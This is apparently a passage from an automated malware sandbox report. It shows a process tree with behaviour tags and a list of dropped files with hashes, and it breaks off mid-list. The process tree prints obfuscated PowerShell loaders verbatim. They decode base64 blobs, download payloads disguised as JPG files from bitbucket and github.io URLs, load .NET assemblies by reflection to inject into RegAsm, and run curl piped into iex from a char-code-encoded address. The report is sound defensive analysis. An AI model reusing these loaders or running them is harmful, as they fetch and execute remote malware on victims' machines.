QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:3528
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                    6⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    PID:7792
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:9836
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2.js"
                  5⤵
                    PID:10088
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            1⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:316
          • C:\Windows\system32\conhost.exe
            conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
            1⤵
            • Process spawned unexpected child process
            PID:4340
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
              2⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2052
          • C:\Windows\system32\conhost.exe
            conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
            1⤵
            • Process spawned unexpected child process
            PID:10200
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
              2⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5984
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            1⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:6644
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            1⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:8268

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe

            Filesize

            1.8MB

            MD5

            4ffd0bca9cd50d388b2aa181ead35e1c

            SHA1

            536af1ccd96a29ef97dbf219a250c4e5a0bfad54

            SHA256

            96264994c4909d2c24fa848cb5a2fafb86b131ff7a4b2dacd7858fb5da6b4906

            SHA512

            148d4d0203fe55f134a53082372055da213ddbe148c06f6c97fd056870db1b0d4eb657a62341b5d0c53e4925f592efa4717c29086498072a2f4fa0b9077f7014

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            e7d0883e28000a6270cf6b3b3f7b6c5a

            SHA1

            74d916eb15baa5ce4a168cd80d3d2c45d503daa2

            SHA256

            63f3369719ec0f4063138a71ba369a25fb4824bc035eaa4072ee6a5a1812480a

            SHA512

            4b4ade064020959bc677689fa658816c8c498c8117df70a1ae4076533972593b4e2c3bf45d39e28662892e12db07641f14870ef69292e81030f8b3d7c92302f1

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            98baf5117c4fcec1692067d200c58ab3

            SHA1

            5b33a57b72141e7508b615e17fb621612cb8e390

            SHA256

            30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

            SHA512

            344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B

            MD5

            b2d65363c873490c29a1a0dd6a135d32

            SHA1

            406a7c5830c1b3a857e1819cbbd0e3a4068579cc

            SHA256

            af8cd4102a6244fb73667f4905ceb8f893af9cc41f1f3b94b402fdea7d7b0893

            SHA512

            fa02f61a0fa50d45e76ff5693898ec247b5859f27225e3e11ea0344969c0846adbd85d6b39fa1e12f0e35d65cc0b748defab423be8896c4ecdd435aeba306e0e

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            92101bd74ac285a0cd3caea2c94976cd

            SHA1

            15e68dda720031ec4ed235c5a2eadf042c54bf70

            SHA256

            d1fdc89244775f221ab9f0bf6bf72b0bb81cdde6db2ee5071a17e69a932cc8b0

            SHA512

            d2c5ac2481cc73f0730cdfd7b7d2ce17a7306bfdf40c1963da44561a8c42e1b6e404783f4f933bb0378cf04c5259599cd188309ed9203ef4bf911fe4793c40a7

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B

            MD5

            34a9dedf77692b601db765b2654b7298

            SHA1

            efe3f8dfd164be04c5fcefa73c00a0d7144d1563

            SHA256

            bc789a2de3c06e73e322d48ddab35e04ee26aee9096acbde0e22c64e546cb40b

            SHA512

            fbcdea77649b868a6dbacc0d2af681ad08a868a191c7414cd4d0df0325f76ee84c5c340b482bc4947f0c26e43e688d1014ce1c01b8a32ce07facde812768de3e

          • C:\Users\Admin\AppData\Local\Temp\10299570101\laf6w_001.exe

            Filesize

            1.3MB

            MD5

            eb3f82a230c97746ad6fc272582ecece

            SHA1

            618bac114606764b85c734803007309660b76cf0

            SHA256

            2fdc0a416cdb38a430a54ea70de97e9c9c5968432e0057725aafdba803f278f2

            SHA512

            9e8ef67c90ec573cf7791d03b0e158e8323060edffb418fa3a4f22726848020fd194b6f83767cb8a3f54cfcff2ab901cb369f03de49fe686fba2a06265e4622e

          • C:\Users\Admin\AppData\Local\Temp\10299580101\4c7c16f8a2.exe

            Filesize

            1.1MB

            MD5

            999c92338f2c92dd095a74f0581fe012

            SHA1

            62d53a745cc4d83a0d00a865cf7f2ec28fb84b1b

            SHA256

            b28e8a5c04dbfcbf462014aedc83bafec26d0eedebefca620b740df26cb09700

            SHA512

            a94b4ba0c4677d0ac231f0047a1eb7556bf7b36b7bcda896782711ff3bb52800ab26f28fe36ef2d445dce3134d5ce8c024466451dd1e58842b5ebbe7e35a70e3

          • C:\Users\Admin\AppData\Local\Temp\10299590101\eBOjg2u.exe

            Filesize

            196KB

            MD5

            1b129d080655a4c9f703a5dce0195512

            SHA1

            9ec187c55fc3f50d98c372a96913fd38462c4ebf

            SHA256

            ee5c9b3dc922c0d16fd7a1e1d72c3530f9aee1209a233764f8280ee7dbc3b353

            SHA512

            09124bae1f5bf9df253b7551188e23b6ad29917c92ace51461987009606b88eedcc6a48f501307ef40127f5877f187549c93574e89435d393e7ae40555b98da5

          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1.bat

            Filesize

            16KB

            MD5

            f6a8b35f102210019dce8177b1df901c

            SHA1

            31de97b7eac8bbdf4dbd08ff8b456dd335839d0a

            SHA256

            1f0aee2640d4748c088bd4aa0b8bef5323add0778731fdfd3fa4d12adda1487b

            SHA512

            41c66b736c6d7aed2b784135eaeb4050c535414a1e0b9db09b95bccac0ff60e2c1acf98d54504530dcdd6230e52da70827fb409b6274d1d93fcf90eec8ae69ca

          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js

            Filesize

            129KB

            MD5

            fae294beeea146fcc79c6ba258159550

            SHA1

            a06d7b2a63faec284d8487dcb7f1bba7f2d6b1e2

            SHA256

            0db879398b091aaa19fe58c398b589c47a9e78194600cfdff150c50f4ef40e31

            SHA512

            f1757bc2a9b0285d2b2831c70d21811aab9cdfe25659ffc2541ff8298ba50208b3c670df0cf6f823a8f92dd2e55a9412465407c14ce192d5a521d48cfa38408a

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snt4ma3k.hrx.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

            Filesize

            2.0MB

            MD5

            453e433ce707a2dff379af17e1a7fe44

            SHA1

            c95d4c253627be7f36630f5e933212818de19ed7

            SHA256

            ab8b903ee062c93347eb738d00d0dbf707cdbbb8d26cf4dac7691ccbf8a8aff2

            SHA512

            9aa5b06bf01017aa13fd57350ba627cc892246e55e5adf8d785ff8a2252da7cbc28cf5e5e4170d877e4be01538a230646cfc581873acf183f0485c66e6397fd4

          • C:\Users\Admin\AppData\Local\Temp\etmp3854E463-A6F3-8149-8290-2EC8DC850191

            Filesize

            2.0MB

            MD5

            db07fd269be526a06116ffe4d317c4d1

            SHA1

            5e0ca65cc497996a787de03d505672026c193a6d

            SHA256

            421d7611778f0aabb5a4d53af0b2c4cf18cdec3be30e63b17cdb72fa8d212112

            SHA512

            4de748e999e8e61f2b6215877d8768810345fb929cc4ff1d20577552779c23ca746011e0176c6064320621e467f3e874c54045fae83ba6b8adbfd8d026f973c7

          • C:\Users\Admin\AppData\Local\Temp\etmpC707BC38-9F29-984B-9A2A-1DDCC983C50E

            Filesize

            2.0MB

            MD5

            a7ea8adaa9e5854b27607586e8c11eec

            SHA1

            105d94522153c6e9613ece7a918ebcd08ee3818b

            SHA256

            7a588677178a592bd40f92917d4362e820f2d49f0233615c71f013eceae16bc5

            SHA512

            52f7c2e289e557d4c88a3fa2b28c32b38eea9ea62399e5a9184383d851800d583b73c253ca50b2fe783f3b0df8b01b43df54e4131d323f68c27c55bd44979998

          • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

            Filesize

            1.3MB

            MD5

            15bdc4bd67925ef33b926843b3b8154b

            SHA1

            646af399ef06ac70e6bd43afe0f978f0f51a75fd

            SHA256

            4f0b2c61bccfd9aa3db301ee4e15607df41ded533757de34c986a0ff25b6246d

            SHA512

            eac0736a06d0835758318d594d3560ee6be82889020a173463943956dd400d08cf1174a4c722dc45a3f3c034131982f4b19ff27db1163838afbfac37f397eaf8

          • C:\Users\Admin\AppData\Local\Temp\{4d4db971-2851-4886-91c9-174cd6f0979d}\d7f06ba9-cadb-4be1-8361-a1bd5fccbdd5.cmd

            Filesize

            695B

            MD5

            3246ec5fbf515b60df0829be66303d8e

            SHA1

            87f1e5cd0345b4ca33c42d43f674981b923eef6b

            SHA256

            8707e226c25ae6adf8e2bdafe8eae3c7eb34a6988bb09813596027d43e16b1d2

            SHA512

            03a487754b19bc69562a795611e40fdaa859c1de1856d6c601775fa963cd0109c9fc8c3e46226a84a6d6be7e460bb2b1ba72fb8f2f5458f13674577fecbb2721

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\Bases\KSN\log0

            Filesize

            582KB

            MD5

            fdc179b5d0c27a28ea75b7f52c0802bc

            SHA1

            a9c871ffc68f6e37e2926c3db4d67a1b5b90b29b

            SHA256

            2be66bb7bc79566f18cbd35ebc85abef3424e5a49d7fecb7110b0f093ab51619

            SHA512

            f7633a640f6f41278ed5039e9401012c2d46364642e502c68acd8a828b2a784a71a4ea9b0861fb79e5830e93e855994829bf91d7e747695b775b811ee5b740d0

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\Bases\SCO\log0

            Filesize

            810KB

            MD5

            c5ac3d1dc132f60e1e909247e9105d49

            SHA1

            9965fa31126eee28382b14c9307913a91e7a259f

            SHA256

            d792cad3aaa7d121c1efe2187ef0dd5726c16b1e41c38a6248cdee93b8cf2301

            SHA512

            5d368b5b281d7546c935c62498012e1ec837dfe8ea9060e1c23bc37cee54eac6c15e57235449fcd2bd9cdfca8978318ee713a601c90d4e6c5e225f6c5be93b20

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\Bases\arkmon64.drv

            Filesize

            390KB

            MD5

            7c924dd4d20055c80007791130e2d03f

            SHA1

            072f004ddcc8ddf12aba64e09d7ee0ce3030973e

            SHA256

            406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

            SHA512

            ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\KVRT.exe

            Filesize

            2.6MB

            MD5

            3fb0ad61548021bea60cdb1e1145ed2c

            SHA1

            c9b1b765249bfd76573546e92287245127a06e47

            SHA256

            5d1a788260891c317f9d05b3387e732af908959c5ad4f5a84e7984bee71084f1

            SHA512

            38269c22fda1fdee5906c2bfdfc19b77b5f6d8da2be939c6d8259b536912f8bc6f261f5c508f47ade8ab591a54aafbfbcc302219820bad19feb78fcc3586d331

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\app_core.dll

            Filesize

            1.3MB

            MD5

            fe0964663cf9c5e4ff493198e035cc1f

            SHA1

            ab9b19bd0e4efa36f78d2059b4ca556521eb35cb

            SHA256

            ddd70011d86b8ec909295ef45f94b48b0252229b6182af9ef8a6029c30daaf39

            SHA512

            923cfd9143d3850357bda901f66b5292f36ff025f05b2156667873861a02d9f498a03cdb73d2c477c0055d46600628f936b70dec46d7687fe0a97cbb1c8cf0ea

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\app_core_meta.dll

            Filesize

            619KB

            MD5

            81172e3cf5fc6df072b45c4f1fb6eb34

            SHA1

            5eb293f0fe6c55e075c5ebef4d21991546f7e504

            SHA256

            2a272a1990a3dfa35693adf0689512b068a831283a852f8f805cb28153115f57

            SHA512

            8dc4b0d5593cf2c2262b2802b60672c392dfe0e1cd757a3410e5376bbe6bf6c473428a7ca0fc1c7f0d2de5f59017d8464e7789c76999b5d7b5379209b34c1813

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\config.esm

            Filesize

            51KB

            MD5

            184a351c4d532405206e309c10af1d15

            SHA1

            3cf49f2275f3f9bd8e385eddcdd04e3fc2a17352

            SHA256

            ef0b7e22d8f7bd06964969a7f2979a475ba1c9c34efccb0c3b9e03ae950c63f6

            SHA512

            9a1a3cb0e3713ba41f36f4f01f2151b0c04454a05c986215ed2cc42180994f90d10e031d77452a2d0ad5a78f15d8d31c327d0d1ee676789780e6483dbe5e0341

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\crls\c7e6bd7fe0e4965892ad706f0d2f42e88789b8041daf5b3eea9ca41785297798

            Filesize

            367B

            MD5

            9cf88048f43fe6b203cf003706d3c609

            SHA1

            5a9aa718eb5369d640bf6523a7de17c09f8bfb44

            SHA256

            4bdbe6ea7610c570bc481e23c45c38d61e8b45062e305356108fd21f384b75bb

            SHA512

            1d0b42f31911ec8bd8eecc333674863794cfa2b97964cb511132f01a98afd0417b35423fb12461b10a786054f144e598f17d7546a1b17acc6c7efbce5f6f619e

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\crypto_components_meta.dll

            Filesize

            61KB

            MD5

            3d9d1753ed0f659e4db02e776a121862

            SHA1

            031fb78fe7dc211fe9e0dc8ba0027c14e84cd07f

            SHA256

            b6163ec9d4825102e3d423e02fb026259a6a17e7d7696ae060ec2b0ba97f54f2

            SHA512

            e1f50513db117c32505944bfb19fd3185b3231b6bd9f0495942bd9e80dd0f54ab575f1a2fca5e542174d3abe4106a9b5448d924c690e8548cd43aa77f6497c92

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\dbghelp.dll

            Filesize

            1.2MB

            MD5

            4003e34416ebd25e4c115d49dc15e1a7

            SHA1

            faf95ec65cde5bd833ce610bb8523363310ec4ad

            SHA256

            c06430b8cb025be506be50a756488e1bcc3827c4f45158d93e4e3eeb98ce1e4f

            SHA512

            88f5d417377cd62bde417640a79b6ac493e80f0c8b1f63a99378a2a67695ef8e4a541cedb91acfa296ed608e821fee466983806f0d082ed2e74b0cd93eb4fb84

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\dblite.dll

            Filesize

            703KB

            MD5

            98b1a553c8c5944923814041e9a73b73

            SHA1

            3e6169af53125b6da0e69890d51785a206c89975

            SHA256

            6fc0104817caa1337531c9d8b284d80052770051efb76e5829895a3854ebaec8

            SHA512

            8ee4467bce6495f492895a9dfaedaf85b76d6d1f67d9ff5c8c27888191c322863bc29c14ae3f505336a5317af66c31354afaeb63127e7e781f5b249f1c967363

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\dumpwriter.dll

            Filesize

            409KB

            MD5

            f56387639f201429fb31796b03251a92

            SHA1

            23df943598a5e92615c42fc82e66387a73b960ff

            SHA256

